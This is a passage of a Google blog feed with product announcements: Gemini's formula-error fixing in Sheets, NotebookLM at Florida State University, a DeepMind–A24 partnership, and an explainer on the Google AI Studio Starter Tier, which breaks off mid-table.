left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Gradual rollout (up to 15 days for feature visibility) starting on June 22, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer: &lt;/b&gt;Google AI Pro and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons: &lt;/b&gt;Google AI Pro for Education&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Add-ons: &lt;/b&gt;AI Expanded Access*&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;*After July 15, 2026, users with AI Expanded Access licenses will have &lt;a href="https://knowledge.workspace.google.com/admin/getting-started/editions/compare-google-ai-expansion-add-ons?co=DASHER._Family=Business-Enterprise&amp;amp;oco=0&amp;amp;visit_id=639177375718092415-1787668601&amp;amp;p=limits&amp;amp;rd=2#usage-limits" target="_blank"&gt;higher limits on usage&lt;/a&gt; of this feature.&lt;/i&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Docs Editors Help: &lt;a href="https://support.google.com/docs/answer/14356410#create-formulas" target="_blank"&gt;Collaborate with Gemini in Google Sheets&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/troubleshoot-formula-errors-in-sheets.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-22T16:51:44+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/troubleshoot-formula-errors-in-sheets.html</id>
    <title>Troubleshoot formula errors quickly with Gemini in Google Sheets</title>
    <updated>2026-06-22T16:51:44+00:00</updated>
    <content type="html">We’re excited to introduce a new Gemini in Sheets capability that enables you to diagnose and fix formula errors in one click. When you encounter a formula error, Gemini can analyze the surrounding data structure to help provide an easy-to-understand explanation of the core issue alongside a corrected version of the formula. The functionality seamlessly supports everything from basic arithmetic to highly intricate calculations, simplifying what is traditionally a frustrating and time-consuming debugging process.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Since Gemini is built directly in Sheets, it removes the barrier to writing complex formulas for advanced analysis right where you work. This ensures that both novice users and seasoned data analysts can maintain momentum without having to manually parse error messages  or search external forums for solutions.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj54O1iuI_zo73h7DxjdUotXnXPCy5QoXjqanpDeLFxBtND8cT1lW5O_3dgdk4ZNug0rcr0mAYb9ZDWq-OUenzTFGq15jOWYytNLNGaRF3v_KdD49a8Qn3Fb-NUYdmObq6mbBQS73HNGvygUWiupJaSmhntyZWp-Oit_8MeZ_B86laurorGaoy1wQMAIBJ8/s2000/Formula%20Fixer.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="GIF showing formula fixing functionality" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj54O1iuI_zo73h7DxjdUotXnXPCy5QoXjqanpDeLFxBtND8cT1lW5O_3dgdk4ZNug0rcr0mAYb9ZDWq-OUenzTFGq15jOWYytNLNGaRF3v_KdD49a8Qn3Fb-NUYdmObq6mbBQS73HNGvygUWiupJaSmhntyZWp-Oit_8MeZ_B86laurorGaoy1wQMAIBJ8/s16000/Formula%20Fixer.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;This feature is available by default if &lt;a href="https://knowledge.workspace.google.com/admin/gemini/manage-access-to-gemini-features-in-workspace-services" target="_blank"&gt;Gemini for Workspace in Sheets&lt;/a&gt; is enabled.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;You must have &lt;a href="https://support.google.com/mail/answer/15604322?sjid=17363988672514456782-NA#gw&amp;amp;zippy=%2Csmart-features-in-google-workspace%2Cwhat-are-googles-legal-bases-of-processing-for-users-in-the-european-economic-area-united-kingdom-or-switzerland%2Chow-long-is-your-workspace-content-activity-used-to-provide-smart-features-and-to-improve-these-features" target="_blank"&gt;Workspace smart features&lt;/a&gt; enabled to take advantage of these features. Visit the Help Center to &lt;a href="https://support.google.com/docs/answer/16959434" target="_blank"&gt;learn more about building and editing spreadsheets with Gemini in Sheets&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Note: Through July 15, 2026, Workspace customers will get promotional access to higher limits for the improved Gemini in Sheets experience, allowing users to experiment with this feature.. Per-user usage limits will apply after July 15; we’ll provide more information in the Help Center in advance of updated usage limits going into effect.&lt;/i&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Gradual rollout (up to 15 days for feature visibility) starting on June 22, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer: &lt;/b&gt;Google AI Pro and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons: &lt;/b&gt;Google AI Pro for Education&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Add-ons: &lt;/b&gt;AI Expanded Access*&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;*After July 15, 2026, users with AI Expanded Access licenses will have &lt;a href="https://knowledge.workspace.google.com/admin/getting-started/editions/compare-google-ai-expansion-add-ons?co=DASHER._Family=Business-Enterprise&amp;amp;oco=0&amp;amp;visit_id=639177375718092415-1787668601&amp;amp;p=limits&amp;amp;rd=2#usage-limits" target="_blank"&gt;higher limits on usage&lt;/a&gt; of this feature.&lt;/i&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Docs Editors Help: &lt;a href="https://support.google.com/docs/answer/14356410#create-formulas" target="_blank"&gt;Collaborate with Gemini in Google Sheets&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/troubleshoot-formula-errors-in-sheets.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-22T16:51:44+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/education/florida-state-university-notebooklm/</id>
    <title>NotebookLM is transforming student success at FSU</title>
    <updated>2026-06-22T16:00:00+00:00</updated>
    <content type="html">Google NotebookLM at Florida State University: Transforming Student Success with AI YouTube video</content>
    <link href="https://blog.google/products-and-platforms/products/education/florida-state-university-notebooklm/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-22T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/models-and-research/google-deepmind/deepmind-a24-research-partnership/</id>
    <title>Google DeepMind and A24 announce first-of-its-kind research partnership</title>
    <updated>2026-06-22T14:30:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/3_SocialShare_gradient.max-600x600.format-webp.webp" /&gt;Today, Google DeepMind and A24 are announcing a first-of-its-kind partnership focused on research. The collaboration pairs a world-leading research lab with the industry…</content>
    <link href="https://blog.google/innovation-and-ai/models-and-research/google-deepmind/deepmind-a24-research-partnership/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-22T14:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/the-starter-tier-for-google-ai-studio-explained</id>
    <title>The Starter Tier for Google AI Studio explained</title>
    <updated>2026-06-22T14:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You've got a working prototype in &lt;/span&gt;&lt;a href="https://ai.google.dev/aistudio" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google AI Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. A React frontend, a Node.js backend, maybe a database. Now you want a live URL to share with your team, your users, or a friend who wants to try it.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud gives you a full platform for deploying production applications, with fine-grained IAM controls, billing management, and region selection. That's exactly what you want when you're building something serious. But when you just need to get a prototype online in the next ten minutes, there's now a faster path.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;a href="https://docs.cloud.google.com/docs/starter-tier" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Starter Tier&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; resources like &lt;/span&gt;&lt;a href="https://cloud.google.com/run" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Run&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://firebase.google.com/products/firestore" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Firestore&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/sql/docs/postgres" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud SQL for PostgreSQL&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://firebase.google.com/products/auth" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Firebase Authentication&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; are provisioned in a fully-managed project. You can get started with using them without a payment method (like a credit card) or a billing account. Your Google Account is enough to go from prompt to live URL, with a database and auth all baked in.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;What the Starter Tier actually is&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When you set up any of the Starter Tier services within Google AI Studio, Google provisions a fully managed project behind the scenes. You don't create it, configure it, or administer it. Google handles the region selection, API enablement, and security policies for you.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Who can use it? The Starter Tier is currently available to individual Google Accounts. If you are signed in with a corporate or educational &lt;/span&gt;&lt;a href="https://workspace.google.com" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Workspace&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; account, organization-level administrative policies may restrict your ability to deploy resources. It is also bound by the regional availability of Google AI Studio.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;This is different from a standard Google Cloud project where you'd manage IAM roles, enable APIs, and link a billing account. The Starter Tier project is minimalist by design. You can't enable &lt;/span&gt;&lt;a href="https://cloud.google.com/bigquery" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; or &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/pubsub/docs/overview" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Pub/Sub&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in it. You can't change the region of any resources. And that's the point: fewer knobs means fewer ways to go off track.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The console experience matches this philosophy. Instead of the full Google Cloud console with hundreds of product pages, Starter Tier users get a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/docs/starter-tier#manage-resources" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;simplified view&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; focused on what matters for a prototype: application logs, performance metrics, and basic container configuration. If you navigate to an unsupported product, you'll be prompted to start a separate &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/free/docs/free-cloud-features#free-trial" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Free Trial&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; instead of accidentally provisioning billable resources.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;One thing to know: Starter Tier resources aren't governed by the standard Google Cloud Terms of Service. They fall under the &lt;/span&gt;&lt;a href="https://cloud.google.com/terms/starter-tier-additional-terms-of-service" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Starter Tier Additional Terms&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. For prototyping and business applications, these terms won't get in your way.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;What you get: the pre-wired stack&lt;/h3&gt;
&lt;p&gt;The Starter Tier doesn't give you the entire Google Cloud catalog. Instead, it offers a pre-wired stack of four products that are provisioned on demand as your application's architecture requires them.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="updated_architecture" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/updated_architecture.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;Cloud Run&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/run" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Run&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is the compute layer. Every Google AI Studio deployment creates a Cloud Run service that handles HTTP traffic. Under the Starter Tier, you can deploy up to two active web applications at a time per Google Account. Cloud Run services scale automatically based on incoming traffic and scale down to zero when idle, meaning your prototypes don't consume resources when not in use. They run in a single region that is locked in when you first provision your Starter Tier environment.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Firebase Authentication&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;If your app needs user login, the Starter Tier includes &lt;/span&gt;&lt;a href="https://firebase.google.com/products/auth" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Firebase Authentication&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; with &lt;/span&gt;&lt;a href="https://developers.google.com/identity/sign-in/web/sign-in" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Sign-In&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; preconfigured. The AI agent in Google AI Studio can detect when your prompt implies user identity (for example, "build a shared to-do list") and will offer to enable auth automatically.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;If your application builds on &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/databases/vibe-coded-ai-studio-apps-with-firestore-firebase-cloud-sql" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Workspace integrations&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, this sign-in flow simplifies credentials. Once a user logs in, your application can request OAuth access scopes to securely interact with their Gmail, Docs, Calendar, or Sheets data, making it straightforward to prototype internal tools like summarizers or inbox sorters.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Firestore&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;a href="https://firebase.google.com/products/firestore" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Firestore&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is a database service that handles NoSQL data storage. The Google AI Studio agent can provision it automatically when your prompt implies the need for structured data storage. The AI agent generates the client-side sync code (typically a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/src/lib/firebase.ts&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file), and drafts application-appropriate &lt;/span&gt;&lt;a href="https://firebase.google.com/docs/firestore/enterprise/security/get-started" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Firebase Security Rules&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (for example, utilizing &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;request.auth.uid&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to restrict document access to the authenticated creator).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;If you hit a "Missing or insufficient permissions" error, you can click "Fix error" in Google AI Studio, and the agent will rewrite the security rules to match your updated app logic. It's worth reviewing these security rules manually before sharing your app broadly, though. AI-generated security rules are a starting point, not a guarantee.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;All Firestore databases created by the Google AI Studio agent share a usage quota (more on that in the limits section below).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud SQL for PostgreSQL Developer edition&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;When you need relational data with proper schemas, joins, and ACID compliance, the Starter Tier provisions &lt;/span&gt;&lt;a href="https://cloud.google.com/sql/docs/postgres" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud SQL for PostgreSQL&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; Developer edition, designed to work seamlessly with AI Studio agent. The developer edition enables instant provisioning and scale to 0,  which enables fast and low cost developer experience. You also get the full power of open source PostgreSQL with capabilities like &lt;/span&gt;&lt;a href="https://cloud.google.com/discover/what-is-pgvector" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;pgvector&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, so you can build semantic search or RAG applications without bolting on a separate vector database.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;As you iterate on your application using prompts, Google AI Studio agent will automatically generate the required schema and migrate the schema, as you move through building and publishing your application.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;From prompt to live URL in five steps&lt;/h3&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Open Google AI Studio Build Mode.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Go to &lt;/span&gt;&lt;a href="https://ai.google.dev/aistudio" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google AI Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and switch to Build Mode. No payment method, no project setup.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Describe your app.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Type a prompt like "Build a shared to-do list app using Firebase as a backend." The agent generates a React frontend and a Node.js backend, with a live preview on the right side of the screen.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;3. Enable Firebase (if prompted).&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; If your prompt involves user data or authentication, the agent shows a configuration card to enable Firebase. Click the Settings icon to pick a region (this locks in the Cloud Run region too), then confirm.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;4. Click Publish &amp;gt; Get Started &amp;gt; Publish App.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The agent packages your code and provisions a Cloud Run service in your Starter Tier project.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;5. Grab your URL.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Within seconds, you'll have a live &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;.run.app&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; URL. You can monitor it from the simplified Google Cloud console view that shows logs and metrics for your deployed containers.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;That's it. No Dockerfile, no &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gcloud&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; CLI, no YAML configuration files.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;How the Starter Tier compares&lt;/h3&gt;
&lt;p&gt;Google Cloud offers several ways to explore for free. Below, we compare the Starter Tier to the Free Trial, the most common entry point for new users.&lt;/p&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1" style="border-collapse: collapse; width: 100%; height: 387.18px;"&gt;
&lt;tbody&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt; &lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;a href="https://docs.cloud.google.com/docs/starter-tier" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Starter Tier&lt;/strong&gt;&lt;/a&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;a href="https://docs.cloud.google.com/free/docs/free-cloud-features" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Free Trial&lt;/strong&gt;&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 230.391px;"&gt;
&lt;td style="width: 31.4886%; height: 230.391px;"&gt;&lt;span style="vertical-align: baseline;"&gt;What you get&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 230.391px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Pre-wired stack that includes four products, with limited quota:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Run&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Firestore&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud SQL&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
